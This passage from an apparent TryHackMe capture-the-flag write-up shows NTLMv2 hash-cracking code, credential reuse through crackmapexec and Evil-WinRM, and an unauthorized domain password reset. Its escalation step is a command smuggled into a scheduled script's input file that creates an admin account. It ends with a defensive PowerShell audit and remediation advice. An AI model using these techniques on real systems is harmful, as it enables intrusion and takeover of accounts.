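    blob = make_blob(bytes.fromhex("0011223344556677"), 0x01D6BA9C3F7B2A00, "WINDCORP", "FIRE")
    proof = ntlmv2_proof(password, "buse", "WINDCORP", server_challenge, blob)
    return responder_line("buse", "WINDCORP", server_challenge, proof, blob)


if __name__ == "__main__":
    line = sample_capture()
    print(line)
    print("cracked:", crack(line, ["123456", "password", "uzunLM+3131"]))
```

Two things the code makes visible that the john output hides: the server challenge and the blob are public, so anyone who captures the exchange can test candidates offline at full speed, and the whole thing hinges on a single unsalted MD4 of the password, which is why a rockyou-grade password falls in seconds.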

We successfully cracked buse's password. Let's check with crackmapexec whether we can psexec over SMB or log in over WinRM with it.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm  -u buse -p 'uzunLM+3131'
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\buse:uzunLM+3131

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec winrm windcorp.thm  -u buse -p 'uzunLM+3131'
WINRM       10.10.226.131   5985   FIRE             [*] http://10.10.226.131:5985/wsman
WINRM       10.10.226.131   5985   FIRE             [+] WINDCORP\buse:uzunLM+3131 (Pwn3d!)

The SMB check only confirms the credentials (no Pwn3d!, so buse is not a local admin), but crackmapexec says Pwn3d! for WinRM, which means buse is allowed to log in over WinRM and we can use Evil-WinRM to get a shell.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ evil-winrm -i windcorp.thm -u buse -p 'uzunLM+3131'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\buse\Documents> whoami
windcorp\buse
*Evil-WinRM* PS C:\Users\buse\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\buse\Desktop> dir


    Directory: C:\Users\buse\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/7/2020   3:00 AM                Also stuff
d-----         5/7/2020   2:58 AM                Stuff
-a----         5/2/2020  11:53 AM             45 Flag 2.txt
-a----         5/1/2020   8:33 AM             37 Notes.txt


*Evil-WinRM* PS C:\Users\buse\Desktop> type "Flag 2.txt"
THM{6f690fc72b******************************}

Privilege Escalation

First we check which groups buse belongs to and whether we hold any special privileges.

*Evil-WinRM* PS C:\users> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ============================================
windcorp\buse S-1-5-21-555431066-3599073733-176599750-5777


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                   Alias            S-1-5-32-548                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users                Alias            S-1-5-32-555                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
WINDCORP\IT                                 Group            S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

We are a member of the Account Operators group, which can create and manage domain user and group accounts but cannot touch administrative accounts or the protected groups (Administrators, Domain Admins and the other operator groups). Browsing the filesystem we find C:\scripts, containing checkservers.ps1 and a log.txt whose "Last run" timestamp is only a minute old, so something executes the script on a schedule under another account (we cannot even write log.txt ourselves). Running it by hand shows that line 25 reads C:\Users\brittanycr\hosts.txt, a file buse is not allowed to read.

*Evil-WinRM* PS C:\scripts> dir


    Directory: C:\scripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/3/2020   5:53 AM           4119 checkservers.ps1
-a----       11/14/2020  10:14 AM             31 log.txt


*Evil-WinRM* PS C:\scripts> type log.txt
Last run: 11/14/2020 10:15:03
*Evil-WinRM* PS C:\scripts> .\checkservers.ps1
11/14/2020 10:15:16 AM
Access is denied
At C:\scripts\checkservers.ps1:25 char:1
+ get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Cannot find path 'C:\Users\brittanycr\hosts.txt' because it does not exist.
At C:\scripts\checkservers.ps1:25 char:1
+ get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
Last run: 11/14/2020 10:15:17
Access to the path 'C:\scripts\log.txt' is denied.
At C:\scripts\checkservers.ps1:81 char:1
+ Set-Content -Path C:\scripts\log.txt -Value $log
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Set-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.SetContentCommand
Available count: 0
Not available count: 0
Not available hosts:
Sleeping 45 seconds
10/14/2022 10:16:02 AM

Since we are part of the Account Operators group let’s reset the password for the account “brittanycr”.

*Evil-WinRM* PS C:\scripts> net user brittanycr hello123#
The command completed successfully.

*Evil-WinRM* PS C:\scripts>

Now let’s edit that hosts.txt file so that the script creates a new admin user for us.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u brittanycr -p 'hello123#'
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\brittanycr:hello123#

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec winrm windcorp.thm -u brittanycr -p 'hello123#'
WINRM       10.10.226.131   5985   FIRE             [*] http://10.10.226.131:5985/wsman
WINRM       10.10.226.131   5985   FIRE             [-] WINDCORP\brittanycr:hello123# "Failed to authenticate the user brittanycr with ntlm"

It seems we can’t psexec or WinRM into the box as brittanycr. Let’s use smbclient to upload our malicious hosts.txt file instead.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ smbclient -U 'brittanycr' //windcorp.thm/Users
Enter WORKGROUP\brittanycr's password:
Try "help" to get a list of possible commands.
smb: \> cd brittanycr\
smb: \brittanycr\> dir
  .                                   D        0  Sun May  3 05:06:46 2020
  ..                                  D        0  Sun May  3 05:06:46 2020
  hosts.txt                           A       22  Sun May  3 19:14:57 2020

		15587583 blocks of size 4096. 10891432 blocks available

Let’s make our malicious hosts.txt file:

net user sid hello!123 /add;net localgroup Administrators sid /add

Now let’s put it using smbclient.

smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.2 kb/s) (average 0.2 kb/s)
smb: \brittanycr\> exit

Let’s verify that it worked; we can use crackmapexec for this.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u sid -p 'hello!123'
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\sid:hello!123 (Pwn3d!)

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py sid@windcorp.thm
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on windcorp.thm.....
[*] Found writable share ADMIN$
[*] Uploading file cfKhdeUq.exe
[*] Opening SVCManager on windcorp.thm.....
[*] Creating service TNal on windcorp.thm.....
[*] Starting service TNal.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1158]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\users\Administrator\Desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 84E1-0562

 Directory of c:\Users\Administrator\Desktop

05/10/2020  03:17 AM    <DIR>          .
05/10/2020  03:17 AM    <DIR>          ..
05/07/2020  12:22 AM                47 Flag3.txt
               1 File(s)             47 bytes
               2 Dir(s)  44,605,804,544 bytes free

c:\Users\Administrator\Desktop>type "Flag3.txt"
THM{ba3a2bff2e******************************}

c:\Users\Administrator\Desktop>

And that was the box.
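From the defender's side, the chain above needs two things to be true at once: a non-admin principal (here, an Account Operators member) can reset the password of the account whose file the scheduled script consumes, and that file lives somewhere the account can write. As an added audit example (not part of this writeup; it assumes the ActiveDirectory module, a domain-joined host where the tasks are registered, and that SYSTEM and BUILTIN\Administrators are the only intended writers), this PowerShell lists Account Operators members and flags scheduled-task PowerShell scripts, and the files those scripts read with Get-Content, that are writable by anyone else.

```powershell
# Added audit example; assumptions: ActiveDirectory module present, run with rights to read
# task definitions and file ACLs, and the principals below are the only ones expected to write.
Import-Module ActiveDirectory

Write-Host '== Account Operators members (can reset passwords of non-protected accounts) =='
Get-ADGroupMember -Identity 'Account Operators' -Recursive |
    Select-Object Name, SamAccountName, objectClass | Format-Table -AutoSize

$adminOnly = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER')
# Write bit of FileSystemRights plus the GENERIC_WRITE / GENERIC_ALL bits that ACEs sometimes carry.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]::Write -bor 0x40000000 -bor 0x10000000

function Get-NonAdminWriters {
    # Returns the identities, other than the expected admin principals, with any write right on $Path.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    (Get-Acl -LiteralPath $Path).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (([int]$_.FileSystemRights) -band $writeMask) -ne 0 -and
            $_.IdentityReference.Value -notin $adminOnly
        } |
        ForEach-Object { $_.IdentityReference.Value }
}

Get-ScheduledTask | Where-Object State -ne 'Disabled' | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        # Pull any *.ps1 path out of the action's executable and arguments.
        $scripts = [regex]::Matches("$($action.Execute) $($action.Arguments)", '[A-Za-z]:\\[^\s"]+\.ps1') |
                   ForEach-Object { $_.Value }
        foreach ($script in $scripts) {
            $writers = Get-NonAdminWriters -Path $script
            if ($writers) {
                Write-Warning "$($task.TaskName) runs $script, which is writable by: $($writers -join ', ')"
            }
            if (-not (Test-Path -LiteralPath $script)) { continue }
            # Files the script reads: absolute paths passed to Get-Content (or its aliases).
            $pattern = '(?i)\b(?:get-content|gc|cat|type)\s+(?:-(?:literal)?path\s+)?["'']?([A-Za-z]:\\[^\s"'']+)'
            $inputs  = [regex]::Matches((Get-Content -LiteralPath $script -Raw), $pattern) |
                       ForEach-Object { $_.Groups[1].Value }
            foreach ($in in $inputs) {
                $w = Get-NonAdminWriters -Path $in
                if ($w) {
                    Write-Warning "$($task.TaskName): $script reads $in, which is writable by: $($w -join ', ')"
                }
            }
        }
    }
}
```

Against a layout like the one on this box, the second loop would warn that the task's script reads a file under a user's profile that the user can write. The fixes follow directly: move the input next to the script under an admin-only ACL, run the task under an account that Account Operators cannot touch (a member of a protected group or a managed service account), and keep the Account Operators membership list as short as the first query shows it needs to be.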

Written by Shivam Taneja

IT Security Consultant, Researcher, Penetration Tester & Hacker.